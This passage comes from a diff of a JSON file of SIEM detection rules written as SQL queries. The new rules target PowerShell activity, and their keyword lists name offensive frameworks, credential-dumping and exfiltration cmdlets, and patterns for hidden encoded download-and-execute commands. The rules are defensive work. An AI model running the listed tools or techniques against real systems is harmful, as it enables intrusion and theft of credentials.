ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_esent_ntdsutil_abuse.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "MSSQL Disable Audit Settings", - "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "title": "Suspicious Get Information for SMB Share - PowerShell Module", + "id": "6942bd25-5970-40ab-af49-944247103358", "status": "experimental", - "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "This event should only fire when an administrator is modifying the audit policy. 
Which should be a rare occurrence once it's set up" + "Administrator script" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload LIKE '%get-smbshare%' ESCAPE '\\' OR ContextInfo LIKE '%get-smbshare%' ESCAPE '\\'))" ], - "filename": "win_mssql_disable_audit_settings.yml" + "filename": "posh_pm_susp_smb_share_reco.yml" }, { - "title": "Dump Ntds.dit To Suspicious Location", - "id": "94dc4390-6b7c-4784-8ffc-335334404650", - "status": "experimental", - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "AD Groups Or Users Enumeration Using PowerShell - PoshModule", + "id": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", + "status": "test", + "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", + "author": "frack113", "tags": [ - "attack.execution" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Legitimate backup operation/creating shadow copies" + "Administrator script" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID = '325' AND Data LIKE '%ntds.dit%' ESCAPE '\\' AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR 
Data LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Appdata\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\ntds.dit%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR ContextInfo LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR (Payload LIKE '%get-aduser%' ESCAPE '\\' AND Payload LIKE '%-f %' ESCAPE '\\' AND Payload LIKE '%-pr %' ESCAPE '\\' AND Payload LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\') OR (ContextInfo LIKE '%get-aduser%' ESCAPE '\\' AND ContextInfo LIKE '%-f %' ESCAPE '\\' AND ContextInfo LIKE '%-pr %' ESCAPE '\\' AND ContextInfo LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\')))" ], - "filename": "win_esent_ntdsutil_abuse_susp_location.yml" + "filename": "posh_pm_susp_ad_group_reco.yml" }, { - "title": "Backup Catalog Deleted", - "id": "9703792d-fd9a-456d-a672-ff92efe4806a", + "title": "Malicious PowerShell Commandlets - PoshModule", + "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", "status": "test", - "description": "Detects backup catalog deletions", - "author": "Florian Roth (Nextron Systems), Tom U. 
@c_APT_ure (collection)", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '524' AND Provider_Name = 'Microsoft-Windows-Backup')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Export-ADR%' ESCAPE '\\' OR Payload LIKE '%Export-ADRCSV%' ESCAPE '\\' OR Payload LIKE '%Export-ADRExcel%' ESCAPE '\\' OR Payload LIKE '%Export-ADRHTML%' ESCAPE '\\' OR Payload LIKE '%Export-ADRJSON%' ESCAPE '\\' OR Payload LIKE '%Export-ADRXML%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ADIDNS%' 
ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE 
'%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE 
'%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE 
'%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%New-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR 
Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "win_susp_backup_delete.yml" + "filename": "posh_pm_malicious_commandlets.yml" }, { - "title": "MSSQL Add Account To Sysadmin Role", - "id": "08200f85-2678-463e-9c32-88dce2f073d1", + "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", + "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", "status": "experimental", - "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" ], - "filename": "win_mssql_add_sysadmin_account.yml" + "filename": "posh_pm_invoke_obfuscation_stdin.yml" }, { - "title": "MSI Installation From Suspicious Locations", - "id": "c7c8aa1c-5aff-408e-828b-998e3620b341", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - 
PowerShell Module", + "id": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", "status": "experimental", - "description": "Detects MSI package installation from suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND (Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\\\\\\\*' ESCAPE '\\')) AND NOT ((Data LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\') OR (Data LIKE '%C:\\\\Windows\\\\TEMP\\\\UpdHealthTools.msi%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%new-object%' ESCAPE '\\' AND Payload LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (Payload LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR Payload LIKE '%system.io.streamreader%' ESCAPE '\\') AND Payload LIKE '%readtoend' ESCAPE '\\')" ], - "filename": "win_msi_install_from_susp_locations.yml" + "filename": "posh_pm_invoke_obfuscation_via_compress.yml" }, { - "title": "MSSQL Extended Stored Procedure Backdoor Maggie", - "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", - "status": "experimental", - "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL 
server", - "author": "Denis Szadkowski, DIRT / DCSO CyTec", + "title": "Bad Opsec Powershell Code Artifacts", + "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "status": "test", + "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "author": "ok @securonix invrep_de, oscd.community", "tags": [ - "attack.persistence", - "attack.t1546" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate extended stored procedures named maggie" + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" ], - "filename": "win_mssql_sp_maggie.yml" + "filename": "posh_pm_bad_opsec_artifacts.yml" }, { - "title": "MSSQL XPCmdshell Suspicious Execution", - "id": "7f103213-a04e-4d59-8261-213dddf22314", + "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", + "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects 
suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE 
'%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "win_mssql_xp_cmdshell_audit_log.yml" + "filename": "posh_pm_susp_invocation_specific.yml" }, { - "title": "MSSQL SPProcoption Set", - "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "title": "Malicious PowerShell Scripts - PoshModule", + "id": "41025fd7-0466-4650-a813-574aaacbe7f4", "status": "experimental", - "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.persistence" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the feature by administrators (rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE 